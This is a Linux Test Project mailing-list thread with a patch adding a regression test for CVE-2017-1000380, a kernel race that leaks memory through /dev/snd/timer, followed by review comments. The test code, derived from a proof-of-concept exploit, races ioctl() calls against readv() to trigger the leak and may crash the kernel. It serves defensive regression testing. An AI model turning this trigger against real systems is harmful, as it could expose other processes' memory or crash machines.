* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
@ 2019-07-11 14:10 Michael Moese
2019-07-12 13:31 ` Cyril Hrubis
2019-07-16 10:19 ` Li Wang
0 siblings, 2 replies; 4+ messages in thread
From: Michael Moese @ 2019-07-11 14:10 UTC (permalink / raw)
To: ltp
A race condition was present in the linux kernel, which could lead to
a leak of arbitrary kernel memory to userspace applications.
The issue was fixed in those kernel commits:
http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
This patch adds a regression test triggering this race condition.
Signed-off-by: Michael Moese <mmoese@suse.de>
---
Changes to v2:
- remove leftover declarion of unused variable in ioctl_thread()
- reduced iov_len by 1, so the strlen command hits a valid \0 for sure
in any case.
- fix whitespace before tab in Makefile
Changes to v1:
- Initialize buffers in ioctl_thread() outside of the loop
- use return unused() instead of a void* cast of NULL in ioctl_thread()
- reset non-zero flag in run() for every iteration of the main loop
---
runtest/cve | 1 +
testcases/kernel/Makefile | 1 +
testcases/kernel/sound/.gitignore | 1 +
testcases/kernel/sound/Makefile | 12 +++
testcases/kernel/sound/snd_timer01.c | 139 +++++++++++++++++++++++++++
5 files changed, 154 insertions(+)
create mode 100644 testcases/kernel/sound/.gitignore
create mode 100644 testcases/kernel/sound/Makefile
create mode 100644 testcases/kernel/sound/snd_timer01.c
diff --git a/runtest/cve b/runtest/cve
index 031bcdc2a..33c9196e0 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -36,6 +36,7 @@ cve-2017-17052 cve-2017-17052
cve-2017-16939 cve-2017-16939
cve-2017-17053 cve-2017-17053
cve-2017-18075 pcrypt_aead01
+cve-2017-1000380 snd_timer01
cve-2018-5803 sctp_big_chunk
cve-2018-1000001 realpath01
cve-2018-19854 crypto_user01
diff --git a/testcases/kernel/Makefile b/testcases/kernel/Makefile
index 39d79c7d8..eff5b3e7d 100644
--- a/testcases/kernel/Makefile
+++ b/testcases/kernel/Makefile
@@ -52,6 +52,7 @@ SUBDIRS += connectors \
pty \
sched \
security \
+ sound \
timers \
tracing \
diff --git a/testcases/kernel/sound/.gitignore b/testcases/kernel/sound/.gitignore
new file mode 100644
index 000000000..57eae0593
--- /dev/null
+++ b/testcases/kernel/sound/.gitignore
@@ -0,0 +1 @@
+snd_timer
diff --git a/testcases/kernel/sound/Makefile b/testcases/kernel/sound/Makefile
new file mode 100644
index 000000000..ad1e25c30
--- /dev/null
+++ b/testcases/kernel/sound/Makefile
@@ -0,0 +1,12 @@
+# SPDX-License-Identifier: GPL-2.0-or-later
+
+top_srcdir := ../../..
+
+include $(top_srcdir)/include/mk/testcases.mk
+
+CPPFLAGS += -D_GNU_SOURCE
+
+LDLIBS += -pthread
+
+
+include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/kernel/sound/snd_timer01.c b/testcases/kernel/sound/snd_timer01.c
new file mode 100644
index 000000000..fe2f3ed3f
--- /dev/null
+++ b/testcases/kernel/sound/snd_timer01.c
@@ -0,0 +1,139 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+
+/* Copyright (c) 2019 Michael Moese <mmoese@suse.com>
+ * Regression test for CVE-2017-1000380 based on the original PoC exploit
+ * by Alexander Potapenko <glider@google.com>
+ *
+ * Be careful! This test may crash your kernel!
+ *
+ * The test performs several ioctl() parallel with readv() on the same
+ * file descriptor to /dev/snd/timer. A buggy kernel will leak memory
+ * to the process, which may contain information from the the kernel or
+ * any other process on the system.
+ *
+ * The issue was fixed with
+ * http://git.kernel.org/linus/d11662f4f798b50d8c8743f433842c3e40fe3378
+ * http://git.kernel.org/linus/ba3021b2c79b2fa9114f92790a99deb27a65b728
+ */
+
+#include "config.h"
+#include "tst_test.h"
+#include "tst_taint.h"
+#include "tst_fuzzy_sync.h"
+#include "tst_safe_macros.h"
+#include "tst_safe_pthread.h"
+
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/uio.h>
+#include <sys/ioctl.h>
+#include <sound/asound.h>
+
+#define MAX_BUFSIZE 1024
+
+static int snd_fd;
+static struct tst_fzsync_pair fzsync_pair;
+
+static void *ioctl_thread(void *unused)
+{
+ int tread_arg = 1;
+ struct snd_timer_select ts;
+ struct snd_timer_params tp;
+
+ memset(&ts, 0, sizeof(ts));
+ ts.id.dev_class = 1;
+
+ memset(&tp, 0, sizeof(tp));
+ tp.ticks = 1;
+ tp.filter = 0xf;
+
+ while (tst_fzsync_run_b(&fzsync_pair)) {
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_TREAD, &tread_arg);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_SELECT, &ts);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_PARAMS, &tp);
+
+ ioctl(snd_fd, SNDRV_TIMER_IOCTL_START, 0);
+
+ tst_fzsync_end_race_b(&fzsync_pair);
+ }
+ return unused;
+}
+
+static void setup(void)
+{
+ tst_fzsync_pair_init(&fzsync_pair);
+ tst_taint_init(TST_TAINT_W | TST_TAINT_D);
+ snd_fd = SAFE_OPEN("/dev/snd/timer",
+ O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
+}
+
+static void cleanup(void)
+{
+ tst_fzsync_pair_cleanup(&fzsync_pair);
+ SAFE_CLOSE(snd_fd);
+}
+
+static void run(void)
+{
+ size_t len;
+ int size;
+ struct iovec iov;
+ pthread_t th;
+ char read_buf[MAX_BUFSIZE];
+ int i, nz;
+ pthread_attr_t thread_attr;
+
+ pthread_attr_init(&thread_attr);
+ pthread_attr_setdetachstate(&thread_attr, PTHREAD_CREATE_DETACHED);
+ SAFE_PTHREAD_CREATE(&th, &thread_attr, ioctl_thread, NULL);
+
+ iov.iov_base = read_buf;
+ iov.iov_len = sizeof(read_buf) - 1;
+
+ while (tst_fzsync_run_a(&fzsync_pair)) {
+ nz = 0;
+ memset(read_buf, 0, sizeof(read_buf));
+ size = readv(snd_fd, &iov, 1);
+
+ tst_fzsync_end_race_a(&fzsync_pair);
+
+ /* check if it could be a valid ioctl result */
+ if (size == 0)
+ continue;
+
+ /* check if the buffer is non-empty */
+ for (i = 0; i < size; i++) {
+ if (read_buf[i]) {
+ nz = 1;
+ break;
+ }
+ }
+ if (!nz)
+ continue;
+
+ len = strlen(read_buf);
+ /* the kernel's struct snd_timer_read is two unsigned integers*/
+ if (len <= 2 * sizeof(unsigned int))
+ continue;
+
+ tst_res(TFAIL, "kernel seems vulnerable");
+ return;
+ }
+
+ if (tst_taint_check() != 0)
+ tst_res(TFAIL, "kernel seems vulnerable");
+ else
+ tst_res(TPASS, "kernel seems not vulnerable");
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+};
--
2.22.0
^ permalink raw reply related [flat|nested] 4+ messages in thread
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
2019-07-11 14:10 [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380 Michael Moese
@ 2019-07-12 13:31 ` Cyril Hrubis
2019-07-16 10:19 ` Li Wang
1 sibling, 0 replies; 4+ messages in thread
From: Cyril Hrubis @ 2019-07-12 13:31 UTC (permalink / raw)
To: ltp
Hi!
Pushed with a minor change, thanks.
> +static void cleanup(void)
> +{
> + tst_fzsync_pair_cleanup(&fzsync_pair);
I've removed the tst_fzsync_pair_cleanup() here because the function is
no-op unless you started the second thread by the fzsync reste call.
> + SAFE_CLOSE(snd_fd);
> +}
--
Cyril Hrubis
chrubis@suse.cz
^ permalink raw reply [flat|nested] 4+ messages in thread
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
2019-07-11 14:10 [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380 Michael Moese
2019-07-12 13:31 ` Cyril Hrubis
@ 2019-07-16 10:19 ` Li Wang
2019-07-16 10:31 ` Cyril Hrubis
1 sibling, 1 reply; 4+ messages in thread
From: Li Wang @ 2019-07-16 10:19 UTC (permalink / raw)
To: ltp
On Thu, Jul 11, 2019 at 10:10 PM Michael Moese <mmoese@suse.de> wrote:
> ...
> +
> +static void setup(void)
> +{
> + tst_fzsync_pair_init(&fzsync_pair);
> + tst_taint_init(TST_TAINT_W | TST_TAINT_D);
> + snd_fd = SAFE_OPEN("/dev/snd/timer",
> + O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
>
Should we check if the file exists before opening it?
Otherwise, snd_timer01 failed as:
# ./snd_timer01
tst_test.c:1100: INFO: Timeout per run is 0h 05m 00s
safe_macros.c:225: BROK: snd_timer01.c:73: open(/dev/snd/timer,1052992,00)
failed: ENOENT
# lsmod |grep -i snd
# grep -i snd /boot/config-4.18.0-107.el8.s390x
# ls /dev/snd/timer
ls: cannot access '/dev/snd/timer': No such file or directory
--
Regards,
Li Wang
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.linux.it/pipermail/ltp/attachments/20190716/3c171fad/attachment.htm>
^ permalink raw reply [flat|nested] 4+ messages in thread
* [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380
2019-07-16 10:19 ` Li Wang
@ 2019-07-16 10:31 ` Cyril Hrubis
0 siblings, 0 replies; 4+ messages in thread
From: Cyril Hrubis @ 2019-07-16 10:31 UTC (permalink / raw)
To: ltp
Hi!
> > +static void setup(void)
> > +{
> > + tst_fzsync_pair_init(&fzsync_pair);
> > + tst_taint_init(TST_TAINT_W | TST_TAINT_D);
> > + snd_fd = SAFE_OPEN("/dev/snd/timer",
> > + O_RDONLY|O_CREAT|O_NOCTTY|O_SYNC|O_LARGEFILE, 0);
> >
>
> Should we check if the file exists before opening it?
Yes we should. We should add access("/dev/snd/timer", F_OK) to the test
setup.
> Otherwise, snd_timer01 failed as:
>
> # ./snd_timer01
> tst_test.c:1100: INFO: Timeout per run is 0h 05m 00s
> safe_macros.c:225: BROK: snd_timer01.c:73: open(/dev/snd/timer,1052992,00)
> failed: ENOENT
>
> # lsmod |grep -i snd
>
> # grep -i snd /boot/config-4.18.0-107.el8.s390x
>
> # ls /dev/snd/timer
> ls: cannot access '/dev/snd/timer': No such file or directory
I guess that there is no soundcard on mainframe :-).
--
Cyril Hrubis
chrubis@suse.cz
^ permalink raw reply [flat|nested] 4+ messages in thread
end of thread, other threads:[~2019-07-16 10:31 UTC | newest]
Thread overview: 4+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2019-07-11 14:10 [LTP] [PATCH v4] Add a regression test for CVE-2017-1000380 Michael Moese
2019-07-12 13:31 ` Cyril Hrubis
2019-07-16 10:19 ` Li Wang
2019-07-16 10:31 ` Cyril Hrubis
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox